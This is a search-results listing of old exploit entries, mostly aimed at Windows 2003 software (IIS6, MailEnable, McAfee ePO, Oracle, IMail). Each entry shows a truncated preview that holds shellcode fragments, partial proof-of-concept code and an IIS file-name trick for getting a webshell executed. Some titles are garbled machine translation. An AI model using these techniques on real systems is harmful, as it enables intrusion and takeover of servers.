30 matches found
win2003/x64 - Token Stealing shellcode - 59 bytes
;token stealing shellcode Win 2003 x64 ;based on the widely available x86 version ;syntax for NASM ;Author: Csaba Fitzl, @theevilbit ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;important structures and offsets; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;kd dt -r1 nt!TEB ; +0x110 SystemReserved1 : 54 Ptr64 Void...
MailEnable Enterprise & Professional https Remote BoF Exploit
No description provided by source. !/usr/bin/perl This tools and to consider only himself to educational purpose -=MailEnable Enterprise & Professional HTTPS remote BoF exploit=- -= =- -= Discovered & Coded by CorryL info:www.x0n3-h4ck.org=- -= irc.xoned.net x0n3-h4ck corryl80atgmail.com=-...
McAfee ePolicy Orchestrator 4.6.0-4.6.5 (ePowner) - Multiple Vulnerabilities
No description provided by source. Exploit Title: McAfee ePolicy Orchestrator 4.6.0-4.6.5 ePowner - Multiple vulnerabilities Date: 20 November 2012 Exploit Author: [email protected] a.k.a. [email protected] Vendor Homepage: http://www.mcafee.com/uk/products/epolicy-orchestrator.aspx Version...
FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta)
No description provided by source. This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core Framework dual GPLv2 and Artisti...
Savant Web Server 3.1 - Remote Buffer Overflow Exploit (win2003)
No description provided by source. !/usr/bin/perl D:\Documents and Settings\Administrator\Desktop\explo da uppare\provasavant.pl -h 127.0.0.1 -= Savant Web Server 3.1 Remote Buffer Overflow Exploit =- -= =- -= Coded by CorryL info:www.x0n3-h4ck.org =- + Connect to 127.0.0.1 + Using 00b7ead8 // Re...
McAfee ePolicy Orchestrator 4.6.0-4.6.5 (ePowner) - Multiple Vulnerabilities
McAfee ePolicy Owner ePowner version 0.1 is an exploit that can add an administrative user to McAfee ePolicy Orchestrator as well as execute arbitrary commands on versions 4.6.0 through 4.6.5. Exploit Title: McAfee ePolicy Orchestrator 4.6.0-4.6.5 ePowner - Multiple vulnerabilities Date: 20...
McAfee ePolicy Orchestrator 4.6.0 4.6.5 - ePowner Multiple Vulnerabilities
McAfee ePolicy Orchestrator 4.6.0 4.6.5 - ePowner Multiple Vulnerabilities Exploit Title: McAfee ePolicy Orchestrator 4.6.0-4.6.5 ePowner - Multiple vulnerabilities Date: 20 November 2012 Exploit Author: [email protected] a.k.a. [email protected] Vendor Homepage:...
ttplayer 5.6Beta3 - Denial of Service (PoC)
ttplayer 5.6Beta3 - Denial of Service PoC Exploit Title: ttplayer=5.6Beta3 Dos POC Date: 2010-01-06 Author: t-bag YDteam. Software Link: http://ttplayer.qianqian.com Version: 5.6Beta3 Tested on: win7 and win2003 Code : !/usr/bin/python f t-bag crash = "ETM3U\n"+'QQ\1.'+"x41" 81 try: file =...
ttplayer <= 5.6 Beta3 Dos POC
Exploit for unknown platform in category dos / poc ===================== ttplayer = 5.6 Beta3 ===================== Exploit Title: ttplayer = 5.6 Beta3 Dos POC Author: t-bag Software Link: http://ttplayer.qianqian.com Version: 5.6Beta3 Tested on: win7 and win2003 Code : !/usr/bin/python f t-bag...
ttplayer 5.6Beta3 - Denial of Service (PoC)
Exploit Title: ttplayer=5.6Beta3 Dos POC Date: 2010-01-06 Author: t-bag YDteam. Software Link: http://ttplayer.qianqian.com Version: 5.6Beta3 Tested on: win7 and win2003 Code : !/usr/bin/python f t-bag crash = "ETM3U\n"+'QQ\1.'+"x41" 81 try: file = open'1.m3u','w'; file.writecrash; file.close;...
Microsoft IIS PHP File Parsing
IIS 6 0day php original exploit : http://www.securityfocus.com/bid/37460 by: PouyaServer When the upload pictures to File.php;file.jpg when, IIS will automatically parse the php format. to change the file name webshell 1.php;1.jpg Direct access to IE resolves the PHP that is the php shell into...
win2003 IIS6 parsing vulnerability practical and application-vulnerability warning-the black bar safety net
New win2003 IIS6 parsing vulnerability iis6 file parsing vulnerability announced. Use The webshell file name changed 1.asp;.jpg Direct IE access is parsed into ASP That is the asp shell into X.asp;.jpg in win2003 IIS6 environment will automatically resolve to the asp We have to combat it out ...
the oracle implementation of cmd-vulnerability warning-the black bar safety net
Installed a oracle db11g, so wanted to try online streaming in sqlplus, execute the cmd commands, also don't know how, not a good, might be online around the wrong turn. However there is a simple implementation of the cmd method: SQL host net user User accounts for \\PC-ATQHJ4UG1SDA...
Oracle Internet Directory 10.1.4 - Remote Denial of Service
!/usr/bin/python """ Oracle Internet Directory 10.1.4 preauthentication Denial Of Service NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours. Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one shoot, but even when you...
Oracle Internet Directory 10.1.4 - Remote Denial of Service
Oracle Internet Directory 10.1.4 - Remote Denial of Service !/usr/bin/python """ Oracle Internet Directory 10.1.4 preauthentication Denial Of Service NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours. Sometimes you need 2 shoots to crash OID completely. T...
Hair two I have extracted the shellcode-exploit warning-the black bar safety net
Article author: pt007atvip.sina.com I. S. T. O. ALL RIGHTS RESERVED 1, A//win2003+sp2 was added under a test11/Test11!!! Admin user shellcode: unsigned char shellcode= "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x24"...
MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta)
No description provided by source. This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same...
For grasping the win2003 system password trick-vulnerability warning-the black bar safety net
The command line to uninstall the win2003 sp1/sp2 %systemroot%$NtServicePackUninstall$\spuninst\spuninst /U Press the unattended mode to remove the service pack. If you use this option, then uninstall SP1, only fatal errors will only display the prompt. /Q Press the quiet mode to remove SP1, this...
Moving-2006 file upload vulnerability principle and the attack implemented-vulnerability warning-the black bar safety net
Preface: This article is only to let everyone know about this vulnerability, please do not attack others! Action-the recent explosion of a vulnerability, much noise uproar, a lot of big stations have hung up. The use of 2003 year of a vulnerability, the very old, in front of a burst of...
IMail 2006 and 8.x Exp-vulnerability warning-the black bar safety net
C:\imail20068.x1.exe IMail 2006 and 8.x SMTP 'RCPT' T ' Stack Overflow Exploit Coded by Greg Linares glinares. code at GMAIL dot com Usage: imail20068.x1.exe hostname port Payload JMP The Default port is 25 ============================== Payload Options: 1 = Default...